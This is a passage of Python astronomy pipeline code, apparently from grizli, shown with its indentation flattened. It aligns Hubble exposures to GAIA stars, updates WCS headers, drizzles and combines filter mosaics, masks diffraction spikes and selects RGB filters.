ref_tab['dec'] = [-89.]
else:
ref_tab['ra'] = coo.ra[ok].value
ref_tab['dec'] = coo.dec[ok].value
prod = '-'.join(file.split('-')[:-1])
prep.table_to_radec(ref_tab, f'{prod}_gaia.radec')
# radec, ref_catalog = get_radec_catalog(ra=drz_im[0].header['CRVAL1'],
# dec=drz_im[0].header['CRVAL2'],
# product='-'.join(file.split('-')[:-1]), date=drz_im[0].header['EXPSTART'], date_format='mjd',
# reference_catalogs=['GAIA'], radius=radius)
#
# ref_tab = utils.GTable(np.loadtxt(radec, unpack=True).T, names=['ra', 'dec'])
ridx = np.arange(len(ref_tab))
tab[i]['ref_tab'] = ref_tab
idx, dr = tab[i]['cat'].match_to_catalog_sky(ref_tab)
clip = dr < 0.6*u.arcsec
if clip.sum() > 1:
tab[i]['match_idx'][-1] = [idx[clip], ridx[clip]]
msg = '{0} Ncat={1} Nref={2}'
utils.log_comment(utils.LOGFILE,
msg.format(sci_file, mclip.sum(), clip.sum()),
show_date=False,
verbose=True)
# ix, jx = tab[i]['match_idx'][-1]
# ci = tab[i]['cat']#[ix]
# cj = ref_tab#[jx]
if include_internal_matches:
for i, file in enumerate(files):
for j in range(i+1, len(files)):
sidx = np.arange(len(tab[j]['cat']))
idx, dr = tab[i]['cat'].match_to_catalog_sky(tab[j]['cat'])
clip = dr < 0.3*u.arcsec
print(file, files[j], clip.sum())
if clip.sum() < 5:
continue
if clip.sum() > 0:
tab[i]['match_idx'][j] = [idx[clip], sidx[clip]]
#ref_err = 0.01
# shift_only=True
if shift_only > 0:
# Shift only
p0 = np.vstack([[0, 0] for i in tab])
pscl = np.array([10., 10.])
elif shift_only < 0:
# Shift + rot + scale
p0 = np.vstack([[0, 0, 0, 1] for i in tab])
pscl = np.array([10., 10., 100., 100.])
else:
# Shift + rot
p0 = np.vstack([[0, 0, 0] for i in tab])
pscl = np.array([10., 10., 100.])
#ref_err = 0.06
if False:
field_args = (tab, ref_tab, ref_err, shift_only, 'field')
_objfun_align(p0*10., *field_args)
fit_args = (tab, ref_tab, ref_err, shift_only, 'huber')
plot_args = (tab, ref_tab, ref_err, shift_only, 'plot')
plotx_args = (tab, ref_tab, ref_err, shift_only, 'plotx')
pi = p0*1. # *10.
for iter in range(NITER):
fit = minimize(_objfun_align, pi*pscl, args=fit_args, method=method, jac=None, hess=None, hessp=None, bounds=None, constraints=(), tol=tol, callback=None, options=fit_options)
pi = fit.x.reshape((-1, len(pscl)))/pscl
########
# Show the result
fig = plt.figure(figsize=[8, 8])
ax = fig.add_subplot(221)
_objfun_align(p0*pscl, *plot_args)
ax.set_xticklabels([])
ax.set_ylabel('dDec')
ax = fig.add_subplot(223)
_objfun_align(p0*pscl, *plotx_args)
ax.set_ylabel('dDec')
ax.set_xlabel('dRA')
ax = fig.add_subplot(222)
_objfun_align(fit.x, *plot_args)
ax.set_yticklabels([])
ax.set_xticklabels([])
ax = fig.add_subplot(224)
_objfun_align(fit.x, *plotx_args)
ax.set_yticklabels([])
ax.set_xlabel('dRA')
for ax in fig.axes:
ax.grid()
ax.set_xlim(-0.35, 0.35)
ax.set_ylim(-0.35, 0.35)
fig.tight_layout(pad=0.5)
extra_str = ''
if program_str:
extra_str += '.{0}'.format(program_str)
if match_str:
extra_str += '.{0}'.format('.'.join(match_str))
fig.text(0.97, 0.02, time.ctime(), ha='right', va='bottom', fontsize=5, transform=fig.transFigure)
fig.savefig('{0}{1}_fine.png'.format(field_root, extra_str))
np.save('{0}{1}_fine.npy'.format(field_root, extra_str), [visits, fit])
return tab, fit, visits
def update_wcs_headers_with_fine(field_root, backup=True):
"""
Update grism headers with the fine shifts
"""
import os
import numpy as np
import glob
import astropy.io.fits as pyfits
import astropy.wcs as pywcs
from drizzlepac import updatehdr
#import grizli.prep
try:
from .. import prep
except:
from grizli import prep
if backup:
if not os.path.exists('FineBkup'):
os.mkdir('FineBkup')
visits, all_groups, info = np.load(f'{field_root}_visits.npy',
allow_pickle=True)
fit_files = glob.glob('{0}*fine.npy'.format(field_root))
for fit_file in fit_files:
fine_visits, fine_fit = np.load(fit_file, allow_pickle=True)
N = len(fine_visits)
if backup:
for i in range(N):
direct = fine_visits[i]
for file in direct['files']:
os.system(f'cp {file} FineBkup/')
print(file)
trans = np.reshape(fine_fit.x, (N, -1)) # /10.
sh = trans.shape
if sh[1] == 2:
pscl = np.array([10., 10.])
trans = np.hstack([trans/pscl, np.zeros((N, 1)), np.ones((N, 1))])
elif sh[1] == 3:
pscl = np.array([10., 10., 100])
trans = np.hstack([trans/pscl, np.ones((N, 1))])
elif sh[1] == 4:
pscl = np.array([10., 10., 100, 100])
trans = trans/pscl
# Update direct WCS
for ix, direct in enumerate(fine_visits):
#direct = visits[ix]
out_shift, out_rot = trans[ix, :2], trans[ix, 2]
out_scale = trans[ix, 3]
xyscale = trans[ix, :4]
xyscale[2] *= -1
out_rot *= -1
try:
wcs_ref_file = str('{0}.cat.fits'.format(direct['product']))
wcs_ref = pywcs.WCS(pyfits.open(wcs_ref_file)['WCS'].header,
relax=True)
except:
wcs_ref_file = str('{0}_wcs.fits'.format(direct['product']))
wcs_ref = pywcs.WCS(pyfits.open(wcs_ref_file)[0].header,
relax=True)
for file in direct['files']:
prep.update_wcs_fits_log(file, wcs_ref,
xyscale=xyscale,
initialize=False,
replace=('.fits', '.wcslog.fits'),
wcsname='FINE')
updatehdr.updatewcs_with_shift(file,
wcs_ref_file,
xsh=out_shift[0], ysh=out_shift[1],
rot=out_rot, scale=out_scale,
wcsname='FINE', force=True,
reusename=True, verbose=True,
sciext='SCI')
# Bug in astrodrizzle? Dies if the FLT files don't have MJD-OBS
# keywords
im = pyfits.open(file, mode='update')
im[0].header['MJD-OBS'] = im[0].header['EXPSTART']
im.flush()
# Update grism WCS
for i in range(len(all_groups)):
direct = all_groups[i]['direct']
grism = all_groups[i]['grism']
for j in range(N):
if fine_visits[j]['product'] == direct['product']:
print(direct['product'], grism['product'], trans[j, :])
if backup:
for file in grism['files']:
os.system(f'cp {file} FineBkup/')
print(file)
prep.match_direct_grism_wcs(direct=direct, grism=grism,
get_fresh_flt=False,
xyscale=trans[j, :])
def make_reference_wcs(info, files=None, output='mosaic_wcs-ref.fits', filters=['G800L', 'G102', 'G141'], pad_reference=90, pixel_scale=None, get_hdu=True):
"""
Make a reference image WCS based on the grism exposures
Parameters
----------
info : `~astropy.table.Table`
Exposure information table with columns 'FILE' and 'FILTER'.
output : str, None
Filename for output wcs reference image.
filters : list or None
List of filters to consider for the output mosaic. If None, then
use all exposures in the `info` list.
pad_reference : float
Image padding, in `~astropy.units.arcsec`.
pixel_scale : None or float
Pixel scale in in `~astropy.units.arcsec`. If None, then the script
computes automatically
get_hdu : bool
If True, then generate an `~astropy.io.fits.ImageHDU` object and
save to a file if `output` is defined. If False, return just the
computed `~astropy.wcs.WCS`.
Returns
-------
`~astropy.io.fits.ImageHDU` or `~astropy.wcs.WCS`, see `get_hdu`.
"""
if filters is not None:
use = utils.column_values_in_list(info['FILTER'], filters)
if use.sum() == 0:
# All files
files = info['FILE']
else:
files = info['FILE'][use]
else:
files = info['FILE']
# Just ACS, pixel scale 0.03
if pixel_scale is None:
# Auto determine pixel size, 0.03" pixels if only ACS, otherwise 0.06
any_grism = utils.column_values_in_list(info['FILTER'],
['G800L', 'G102', 'G141'])
acs_grism = (info['FILTER'] == 'G800L')
only_acs = list(np.unique(info['INSTRUME'])) == ['ACS']
if ((acs_grism.sum() == any_grism.sum()) & (any_grism.sum() > 0)) | (only_acs):
pixel_scale = 0.03
else:
pixel_scale = 0.06
ref_hdu = utils.make_maximal_wcs(files, pixel_scale=pixel_scale,
get_hdu=get_hdu, pad=pad_reference,
verbose=True)
if get_hdu:
ref_hdu.data = ref_hdu.data.astype(np.int16)
if output is not None:
ref_hdu.writeto(output, overwrite=True, output_verify='fix')
return ref_hdu
else:
return ref_hdu[1]
def drizzle_overlaps(field_root, filters=['F098M', 'F105W', 'F110W', 'F125W', 'F140W', 'F160W'], ref_image=None, ref_wcs=None, bits=None, pixfrac=0.75, scale=0.06, make_combined=False, drizzle_filters=True, skysub=False, skymethod='localmin', match_str=[], context=False, pad_reference=60, min_nexp=2, static=True, skip_products=[], include_saturated=False, multi_driz_cr=False, filter_driz_cr=False, **kwargs):
"""
Drizzle filter groups based on precomputed image associations
"""
import numpy as np
import glob
try:
from .. import prep, utils
except:
from grizli import prep
##############
# Redrizzle
visits, all_groups, info = np.load('{0}_visits.npy'.format(field_root),
allow_pickle=True)
failed_list = glob.glob('*failed')
#overlaps = np.load('{0}_overlaps.npy'.format(field_root))[0]
#keep = []
if make_combined:
if isinstance(make_combined, str):
label = make_combined
else:
label = 'ir'
else:
label = 'ir'
wfc3ir = {'product': '{0}-{1}'.format(field_root, label), 'files': []}
if ref_image is not None:
wfc3ir['reference'] = ref_image
if ref_wcs is not None:
wfc3ir['reference_wcs'] = ref_wcs
filter_groups = {}
for visit in visits:
# Visit failed for some reason
if (visit['product']+'.wcs_failed' in failed_list) | (visit['product']+'.failed' in failed_list) | (visit['product'] in skip_products):
continue
# Too few exposures (i.e., one with unreliable CR flags)
if len(visit['files']) < min_nexp:
continue
# Not one of the desired filters
filt = visit['product'].split('-')[-1]
if filt.upper() not in filters:
continue
# Are all of the exposures in ./?
has_exposures = True
for file in visit['files']:
has_exposures &= os.path.exists('../Prep/'+file)
if not has_exposures:
print('Visit {0} missing exposures, skip'.format(visit['product']))
continue
# IS UVIS?
if visit['files'][0].startswith('i') & ('_flc' in visit['files'][0]):
filt += 'u'
is_uvis = True
else:
is_uvis = False
if len(match_str) > 0:
has_match = False
for m in match_str:
has_match |= m in visit['product']
if not has_match:
continue
if filt not in filter_groups:
filter_groups[filt] = {'product': '{0}-{1}'.format(field_root, filt), 'files': [], 'reference': ref_image, 'reference_wcs': ref_wcs}
filter_groups[filt]['files'].extend(visit['files'])
# Add polygon
if 'footprints' in visit:
for fp in visit['footprints']:
if 'footprint' in filter_groups[filt]:
filter_groups[filt]['footprint'] = filter_groups[filt]['footprint'].union(fp)
else:
filter_groups[filt]['footprint'] = fp.buffer(0)
if (filt.upper() in filters) | (is_uvis & (filt.upper()[:-1] in filters)):
wfc3ir['files'].extend(visit['files'])
if 'footprint' in filter_groups[filt]:
fp_i = filter_groups[filt]['footprint']
if 'footprint' in wfc3ir:
wfc3ir['footprint'] = wfc3ir['footprint'].union(fp_i)
else:
wfc3ir['footprint'] = fp_i.buffer(0)
if len(filter_groups) == 0:
print('No filters found ({0})'.format(filters))
return None
keep = [filter_groups[k] for k in filter_groups]
if (ref_image is None) & (ref_wcs is None):
print('\nCompute mosaic WCS: {0}_wcs-ref.fits\n'.format(field_root))
ref_hdu = utils.make_maximal_wcs(wfc3ir['files'], pixel_scale=scale, get_hdu=True, pad=pad_reference, verbose=True)
ref_hdu.writeto('{0}_wcs-ref.fits'.format(field_root), overwrite=True,
output_verify='fix')
wfc3ir['reference'] = '{0}_wcs-ref.fits'.format(field_root)
for i in range(len(keep)):
keep[i]['reference'] = '{0}_wcs-ref.fits'.format(field_root)
if ref_wcs is not None:
pass
#
if make_combined:
# Figure out if we have more than one instrument
inst_keys = np.unique([os.path.basename(file)[0] for file in wfc3ir['files']])
prep.drizzle_overlaps([wfc3ir], parse_visits=False, pixfrac=pixfrac, scale=scale, skysub=False, bits=bits, final_wcs=True, final_rot=0, final_outnx=None, final_outny=None, final_ra=None, final_dec=None, final_wht_type='IVM', final_wt_scl='exptime', check_overlaps=False, context=context, static=(static & (len(inst_keys) == 1)), include_saturated=include_saturated, run_driz_cr=multi_driz_cr, **kwargs)
np.save('{0}.npy'.format(wfc3ir['product']), [wfc3ir])
if drizzle_filters:
print('Drizzle mosaics in filters: {0}'.format(filter_groups.keys()))
prep.drizzle_overlaps(keep, parse_visits=False, pixfrac=pixfrac, scale=scale, skysub=skysub, skymethod=skymethod, bits=bits, final_wcs=True, final_rot=0, final_outnx=None, final_outny=None, final_ra=None, final_dec=None, final_wht_type='IVM', final_wt_scl='exptime', check_overlaps=False, context=context, static=static, include_saturated=include_saturated, run_driz_cr=filter_driz_cr, **kwargs)
FILTER_COMBINATIONS = {'ir': IR_M_FILTERS+IR_W_FILTERS,
'opt': OPT_M_FILTERS+OPT_W_FILTERS}
def make_filter_combinations(root, weight_fnu=True, filter_combinations=FILTER_COMBINATIONS, min_count=1):
"""
Combine ir/opt mosaics manually scaling a specific zeropoint
"""
# Output normalization os F814W/F140W
ref_h = {}
ref_h['opt'] = {'INSTRUME': 'ACS', 'DETECTOR': 'WFC',
'PHOTFLAM': 7.0178627203125e-20,
'PHOTBW': 653.24393453125, 'PHOTZPT': -21.1,
'PHOTMODE': 'ACS WFC1 F814W MJD#56438.5725',
'PHOTPLAM': 8045.415190625002,
'FILTER1': 'CLEAR1L', 'FILTER2': 'F814W'}
ref_h['ir'] = {'INSTRUME': 'WFC3', 'DETECTOR': 'IR',
'PHOTFNU': 9.5291135e-08,
'PHOTFLAM': 1.4737148e-20,
'PHOTBW': 1132.39, 'PHOTZPT': -21.1,
'PHOTMODE': 'WFC3 IR F140W',
'PHOTPLAM': 13922.907, 'FILTER': 'F140W'}
####
count = {}
num = {}
den = {}
for f in filter_combinations:
num[f] = None
den[f] = None
count[f] = 0
output_sci = {}
head = {}
sci_files = glob.glob('{0}-f*sci.fits*'.format(root))
for sci_file in sci_files:
filt_i = sci_file.split('_dr')[0].split('-')[-1]
filt_ix = sci_file.split('_dr')[0].split('-')[-1]
# UVIS
if filt_i.startswith('f') & filt_i.endswith('u'):
filt_i = filt_i[:-1]
band = None
for f in filter_combinations:
if filt_i.upper() in filter_combinations[f]:
band = f
break
if band is None:
continue
# Which reference parameters to use?
if filt_i.upper() in OPT_W_FILTERS + OPT_M_FILTERS:
ref_h_i = ref_h['opt']
else:
ref_h_i = ref_h['ir']
print(sci_file, filt_i, band)
output_sci[band] = sci_file.replace(filt_ix, band)
im_i = pyfits.open(sci_file)
wht_i = pyfits.open(sci_file.replace('_sci', '_wht'))
photflam = im_i[0].header['PHOTFLAM']
ref_photflam = ref_h_i['PHOTFLAM']
photplam = im_i[0].header['PHOTPLAM']
ref_photplam = ref_h_i['PHOTPLAM']
head[band] = im_i[0].header.copy()
for k in ref_h_i:
head[band][k] = ref_h_i[k]
if num[band] is None:
num[band] = im_i[0].data*0
den[band] = num[band]*0
scl = photflam/ref_photflam
if weight_fnu:
scl_weight = photplam**2/ref_photplam**2
else:
scl_weight = 1.
den_i = wht_i[0].data/scl**2*scl_weight
num[band] += im_i[0].data*scl*den_i
den[band] += den_i
count[band] += 1
# Done, make outputs
for band in filter_combinations:
if (num[band] is not None) & (count[band] >= min_count):
sci = num[band]/den[band]
wht = den[band]
mask = (~np.isfinite(sci)) | (den == 0)
sci[mask] = 0
wht[mask] = 0
print('Write {0}'.format(output_sci[band]))
pyfits.PrimaryHDU(data=sci, header=head[band]).writeto(output_sci[band], overwrite=True, output_verify='fix')
pyfits.PrimaryHDU(data=wht, header=head[band]).writeto(output_sci[band].replace('_sci', '_wht'), overwrite=True, output_verify='fix')
def make_combined_mosaics(root, fix_stars=False, mask_spikes=False, skip_single_optical_visits=True, mosaic_args=args['mosaic_args'], mosaic_driz_cr_type=0, mosaic_drizzle_args=args['mosaic_drizzle_args'], **kwargs):
"""
Drizzle combined mosaics
mosaic_driz_cr_type : int
(mosaic_driz_cr_type & 1) : flag CRs on all IR combined
(mosaic_driz_cr_type & 2) : flag CRs on IR filter combinations
(mosaic_driz_cr_type & 4) : flag CRs on all OPT combined
(mosaic_driz_cr_type & 8) : flag CRs on OPT filter combinations
"""
# if False:
# # j = 125+110w
# auto_script.field_rgb('j013804m2156', HOME_PATH=None, show_ir=True, filters=['f160w','j','f105w'], xsize=16, rgb_scl=[1, 0.85, 1], rgb_min=-0.003)
visits_file = '{0}_visits.npy'.format(root)
visits, groups, info = np.load(visits_file, allow_pickle=True)
# Mosaic WCS
wcs_ref_file = '{0}_wcs-ref.fits'.format(root)
if not os.path.exists(wcs_ref_file):
make_reference_wcs(info, output=wcs_ref_file, get_hdu=True,
**mosaic_args['wcs_params'])
mosaic_pixfrac = mosaic_args['mosaic_pixfrac']
combine_all_filters = mosaic_args['combine_all_filters']
# # Combine all available filters?
# if combine_all_filters:
# all_filters = mosaic_args['ir_filters'] + mosaic_args['optical_filters']
# auto_script.drizzle_overlaps(root,
# filters=all_filters,
# min_nexp=1, pixfrac=mosaic_pixfrac,
# make_combined=True,
# ref_image=wcs_ref_file,
# drizzle_filters=False)
# IR filters
# if 'fix_stars' in visit_prep_args:
# fix_stars = visit_prep_args['fix_stars']
# else:
# fix_stars = False
drizzle_overlaps(root, filters=mosaic_args['ir_filters'], min_nexp=1,
pixfrac=mosaic_pixfrac,
make_combined=False,
ref_image=wcs_ref_file, include_saturated=fix_stars,
multi_driz_cr=(mosaic_driz_cr_type & 1) > 0,
filter_driz_cr=(mosaic_driz_cr_type & 2) > 0,
**mosaic_drizzle_args)
make_filter_combinations(root, weight_fnu=True, min_count=1,
filter_combinations={'ir': IR_M_FILTERS+IR_W_FILTERS})
# Mask diffraction spikes
ir_mosaics = glob.glob('{0}-f*drz_sci.fits'.format(root))
if (len(ir_mosaics) > 0) & (mask_spikes):
cat = prep.make_SEP_catalog('{0}-ir'.format(root), threshold=4,
save_fits=False,
column_case=str.lower)
selection = (cat['mag_auto'] < 18) & (cat['flux_radius'] < 4.5)
selection |= (cat['mag_auto'] < 15.2) & (cat['flux_radius'] < 20)
# Bright GAIA stars to catch things with bad photometry
if True:
print('## Include GAIA stars in spike mask')
ra_center = np.median(cat['ra'])
dec_center = np.median(cat['dec'])
rad_arcmin = np.sqrt((cat['ra']-ra_center)**2*np.cos(cat['dec']/180*np.pi)**2+(cat['dec']-dec_center)**2)*60
try:
gaia_tmp = prep.get_gaia_DR2_catalog(ra_center, dec_center,
radius=rad_arcmin.max()*1.1, use_mirror=False)
idx, dr = utils.GTable(gaia_tmp).match_to_catalog_sky(cat)
gaia_match = (dr.value < 0.5)
gaia_match &= (gaia_tmp['phot_g_mean_mag'][idx] < 20)
gaia_match &= (cat['mag_auto'] < 17.5)
selection |= gaia_match
except:
print('## Include GAIA stars in spike mask - failed')
pass
# Note: very bright stars could still be saturated and the spikes
# might not be big enough given their catalog mag
msg = '\n### mask_spikes: {0} stars\n\n'.format(selection.sum())
utils.log_comment(utils.LOGFILE, msg, show_date=True,
verbose=True)
if selection.sum() > 0:
for visit in visits:
filt = visit['product'].split('-')[-1]
if filt[:2] in ['f0', 'f1']:
mask_IR_psf_spikes(visit=visit, selection=selection,
cat=cat, minR=8, dy=5)
# Remake mosaics
drizzle_overlaps(root, filters=mosaic_args['ir_filters'],
min_nexp=1,
pixfrac=mosaic_pixfrac,
make_combined=False,
ref_image=wcs_ref_file,
include_saturated=fix_stars,
**mosaic_drizzle_args)
make_filter_combinations(root, weight_fnu=True, min_count=1,
filter_combinations={'ir': IR_M_FILTERS+IR_W_FILTERS})
# More IR filter combinations for mosaics
if False:
extra_combinations = {'h': ['F140W', 'F160W'],
'yj': ['F098M', 'F105W', 'F110W', 'F125W']}
make_filter_combinations(root, weight_fnu=True, min_count=2,
filter_combinations=extra_combinations)
# Optical filters
mosaics = glob.glob('{0}-ir_dr?_sci.fits'.format(root))
if (mosaic_args['half_optical_pixscale']): # & (len(mosaics) > 0):
# Drizzle optical images to half the pixel scale determined for
# the IR mosaics. The optical mosaics can be 2x2 block averaged
# to match the IR images.
ref = pyfits.open('{0}_wcs-ref.fits'.format(root))
try:
h = ref[1].header.copy()
_ = h['CRPIX1']
except:
h = ref[0].header.copy()
for k in ['NAXIS1', 'NAXIS2', 'CRPIX1', 'CRPIX2']:
h[k] *= 2
h['CRPIX1'] -= 0.5
h['CRPIX2'] -= 0.5
for k in ['CD1_1', 'CD2_2']:
h[k] /= 2
wcs_ref_optical = '{0}-opt_wcs-ref.fits'.format(root)
data = np.zeros((h['NAXIS2'], h['NAXIS1']), dtype=np.int16)
pyfits.writeto(wcs_ref_optical, header=h, data=data, overwrite=True)
else:
wcs_ref_optical = wcs_ref_file
if len(mosaics) == 0:
# Call a single combined mosaic "ir" for detection catalogs, etc.
make_combined_label = 'ir'
else:
# Make a separate optical combined image
make_combined_label = 'opt'
drizzle_overlaps(root, filters=mosaic_args['optical_filters'],
pixfrac=mosaic_pixfrac, make_combined=False,
ref_image=wcs_ref_optical,
min_nexp=1+skip_single_optical_visits*1,
multi_driz_cr=(mosaic_driz_cr_type & 4) > 0,
filter_driz_cr=(mosaic_driz_cr_type & 8) > 0,
**mosaic_drizzle_args)
make_filter_combinations(root, weight_fnu=True, min_count=1,
filter_combinations={make_combined_label: OPT_M_FILTERS+OPT_W_FILTERS})
# Fill IR filter mosaics with scaled combined data so they can be used
# as grism reference
fill_mosaics = mosaic_args['fill_mosaics']
if fill_mosaics:
if fill_mosaics == 'grism':
# Only fill mosaics if grism filters exist
has_grism = utils.column_string_operation(info['FILTER'],
['G141', 'G102', 'G800L'],
'count', 'or').sum() > 0
if has_grism:
fill_filter_mosaics(root)
else:
fill_filter_mosaics(root)
# Remove the WCS reference files
for file in [wcs_ref_optical, wcs_ref_file]:
if os.path.exists(file):
os.remove(file)
def make_mosaic_footprints(field_root):
"""
Make region files where wht images nonzero
"""
import matplotlib.pyplot as plt
files = glob.glob('{0}-f*dr?_wht.fits'.format(field_root))
files.sort()
fp = open('{0}_mosaic.reg'.format(field_root), 'w')
fp.write('fk5\n')
fp.close()
for weight_image in files:
filt = weight_image.split('_dr')[0].split('-')[-1]
wave = filt[1:4]
if wave[0] in '01':
w = float(wave)*10
else:
w = float(wave)
wint = np.clip(np.interp(np.log10(w/800), [-0.3, 0.3], [0, 1]), 0, 1)
print(filt, w, wint)
clr = utils.RGBtoHex(plt.cm.Spectral_r(wint))
#plt.scatter([0],[0], color=clr, label=filt)
reg = prep.drizzle_footprint(weight_image, shrink=10, ext=0, outfile=None, label=filt) + ' color={0}\n'.format(clr)
fp = open('{0}_mosaic.reg'.format(field_root), 'a')
fp.write(reg)
fp.close()
def fill_filter_mosaics(field_root):
"""
Fill field mosaics with the average value taken from other filters so that all images have the same coverage
Parameters
----------
field_root : str
"""
import glob
import os
import scipy.ndimage as nd
import astropy.io.fits as pyfits
mosaic_files = glob.glob('{0}-ir_dr?_sci.fits'.format(field_root))
mosaic_files += glob.glob('{0}-opt_dr?_sci.fits'.format(field_root))
if len(mosaic_files) == 0:
return False
ir = pyfits.open(mosaic_files[0])
filter_files = glob.glob('{0}-f[01]*sci.fits'.format(field_root))
# If not IR filters, try optical
if len(filter_files) == 0:
filter_files = glob.glob('{0}-f[5-8]*sci.fits'.format(field_root))
for file in filter_files:
print(file)
sci = pyfits.open(file, mode='update')
wht = pyfits.open(file.replace('sci', 'wht'))
mask = wht[0].data == 0
scale = ir[0].header['PHOTFLAM']/sci[0].header['PHOTFLAM']
sci[0].data[mask] = ir[0].data[mask]*scale
sci.flush()
# Fill empty parts of IR mosaic with optical if both available
if len(mosaic_files) == 2:
print('Fill -ir- mosaic with -opt-')
ir_sci = pyfits.open(mosaic_files[0], mode='update')
ir_wht = pyfits.open(mosaic_files[0].replace('sci', 'wht'),
mode='update')
opt_sci = pyfits.open(mosaic_files[1])
opt_wht = pyfits.open(mosaic_files[1].replace('sci', 'wht'))
opt_sci_data = opt_sci[0].data
opt_wht_data = opt_wht[0].data
if opt_sci_data.shape[0] == 2*ir_wht[0].data.shape[0]:
# Half pixel scale
kern = np.ones((2, 2))
num = nd.convolve(opt_sci_data*opt_wht_data, kern)[::2, ::2]
den = nd.convolve(opt_wht_data, kern)[::2, ::2]
opt_sci_data = num/den
opt_sci_data[den <= 0] = 0
opt_wht_data = den
mask = ir_wht[0].data == 0
scale = opt_sci[0].header['PHOTFLAM']/ir_sci[0].header['PHOTFLAM']
ir_sci[0].data[mask] = opt_sci_data[mask]*scale
ir_wht[0].data[mask] = opt_wht_data[mask]/scale**2
ir_sci.flush()
ir_wht.flush()
return True
######################
# Objective function for catalog shifts
def _objfun_align(p0, tab, ref_tab, ref_err, shift_only, ret):
#from grizli.utils import transform_wcs
from scipy.special import huber
from scipy.stats import t as student
from scipy.stats import norm
import numpy as np
import matplotlib.pyplot as plt
from ..utils import transform_wcs
N = len(tab)
trans = np.reshape(p0, (N, -1)) # /10.
#trans[0,:] = [0,0,0,1]
sh = trans.shape
if sh[1] == 2:
# Shift only
pscl = np.array([10., 10.])
trans = np.hstack([trans/pscl, np.zeros((N, 1)), np.ones((N, 1))])
elif sh[1] == 3:
# Shift + rot
pscl = np.array([10., 10., 100.])
trans = np.hstack([trans/pscl, np.ones((N, 1))])
elif sh[1] == 4:
# Shift + rot + scale
pscl = np.array([10., 10., 100., 100])
trans = trans/pscl
print(trans)
#N = trans.shape[0]
trans_wcs = {}
trans_rd = {}
for ix, i in enumerate(tab):
if (ref_err > 0.1) & (ix == 0):
trans_wcs[i] = transform_wcs(tab[i]['wcs'], translation=[0, 0], rotation=0., scale=1.)
trans_rd[i] = trans_wcs[i].all_pix2world(tab[i]['xy'], 1)
else:
trans_wcs[i] = transform_wcs(tab[i]['wcs'], translation=list(trans[ix, :2]), rotation=trans[ix, 2]/180*np.pi, scale=trans[ix, 3])
trans_rd[i] = trans_wcs[i].all_pix2world(tab[i]['xy'], 1)
# Cosine declination factor
cosd = np.cos(np.median(trans_rd[i][:, 1]/180*np.pi))
if ret == 'field':
for ix, i in enumerate(tab):
print(tab[i]['wcs'])
plt.scatter(trans_rd[i][:, 0], trans_rd[i][:, 1], alpha=0.8, marker='x')
continue
for m in tab[i]['match_idx']:
ix, jx = tab[i]['match_idx'][m]
if m < 0:
continue
else:
# continue
dx_i = (trans_rd[i][ix, 0] - trans_rd[m][jx, 0])*3600.*cosd
dy_i = (trans_rd[i][ix, 1] - trans_rd[m][jx, 1])*3600.
for j in range(len(ix)):
if j == 0:
p = plt.plot(trans_rd[i][j, 0]+np.array([0, dx_i[j]/60.]), trans_rd[i][j, 1]+np.array([0, dy_i[j]/60.]), alpha=0.8)
c = p[0].get_color()
else:
p = plt.plot(trans_rd[i][j, 0]+np.array([0, dx_i[j]/60.]), trans_rd[i][j, 1]+np.array([0, dy_i[j]/60.]), alpha=0.8, color=c)
return True
trans_wcs = {}
trans_rd = {}
for ix, i in enumerate(tab):
trans_wcs[i] = transform_wcs(tab[i]['wcs'],
translation=list(trans[ix, :2]),
rotation=trans[ix, 2]/180*np.pi,
scale=trans[ix, 3])
trans_rd[i] = trans_wcs[i].all_pix2world(tab[i]['xy'], 1)
dx, dy = [], []
for i in tab:
mcount = 0
for m in tab[i]['match_idx']:
ix, jx = tab[i]['match_idx'][m]
if m < 0:
continue
else:
# continue
dx_i = (trans_rd[i][ix, 0] - trans_rd[m][jx, 0])*3600.*cosd
dy_i = (trans_rd[i][ix, 1] - trans_rd[m][jx, 1])*3600.
mcount += len(dx_i)
dx.append(dx_i/0.01)
dy.append(dy_i/0.01)
if ret == 'plot':
plt.gca().scatter(dx_i, dy_i, marker='.', alpha=0.1)
# Reference sources
if -1 in tab[i]['match_idx']:
m = -1
ix, jx = tab[i]['match_idx'][m]
dx_i = (trans_rd[i][ix, 0] - tab[i]['ref_tab']['ra'][jx])*3600.*cosd
dy_i = (trans_rd[i][ix, 1] - tab[i]['ref_tab']['dec'][jx])*3600.
rcount = len(dx_i)
mcount = np.maximum(mcount, 1)
rcount = np.maximum(rcount, 1)
dx.append(dx_i/(ref_err/np.clip(mcount/rcount, 1, 1000)))
dy.append(dy_i/(ref_err/np.clip(mcount/rcount, 1, 1000)))
if ret.startswith('plotx') & (ref_err < 0.1):
plt.gca().scatter(dx_i, dy_i, marker='+', color='k', alpha=0.3, zorder=1000)
# Residuals
dr = np.sqrt(np.hstack(dx)**2+np.hstack(dy)**2)
if ret == 'huber': # Minimize Huber loss function
loss = huber(1, dr).sum()*2
return loss
elif ret == 'student': # student-t log prob (maximize)
df = 2.5 # more power in wings than normal
lnp = student.logpdf(dr, df, loc=0, scale=1).sum()
return lnp
else: # Normal log prob (maximize)
lnp = norm.logpdf(dr, loc=0, scale=1).sum()
return lnp
def get_rgb_filters(filter_list, force_ir=False, pure_sort=False):
"""
Compute which filters to use to make an RGB cutout
Parameters
----------
filter_list : list
All available filters
force_ir : bool
Only use IR filters.
pure_sort : bool
Don't use preference for red filters, just use order they appear
Returns
-------
rgb_filt : [r, g, b]
List of filters to use
"""
from collections import OrderedDict
# Sort by wavelength
for_sort = OrderedDict()
use_filters = []
ir_filters = []
# Preferred combinations
filter_list_lower = [f.lower() for f in filter_list]
rpref = ['h', 'f160w', 'f140w']
gpref = ['j', 'yj', 'f125w', 'f110w', 'f105w', 'f098m']
bpref = ['opt', 'visr', 'visb', 'f814w', 'f814wu', 'f606w', 'f606wu' 'f775w', 'f850lp', 'f435w']
pref_list = [None, None, None]
has_pref = 0
for i, pref in enumerate([rpref, gpref, bpref]):
for f in pref:
if f in filter_list_lower:
pref_list[i] = f
has_pref += 1
break
if has_pref == 3:
print('Use preferred r/g/b combination: {0}'.format(pref_list))
return pref_list
for f in filter_list:
if f == 'ir':
continue
elif f == 'opt':
continue
if f == 'uv':
val = 'f0300'
elif f == 'visb':
val = 'f0435'
elif f == 'visr':
val = 'f0814'
elif f == 'y':
val = 'f1000'
elif f == 'yj':
val = 'f1100'
elif f == 'j':
val = 'f1250'
elif f == 'h':
val = 'f1500'
elif f[1] in '01':
val = f[:4]+'0'
else:
val = 'f0'+f[1:4]
# Red filters (>6000)
if val > 'f07':
if (val >= 'v09') & (force_ir):
ir_filters.append(f)
use_filters.append(f)
for_sort[f] = val
pop_indices = []
joined = {'uv': '23', 'visb': '45', 'visr': '678',
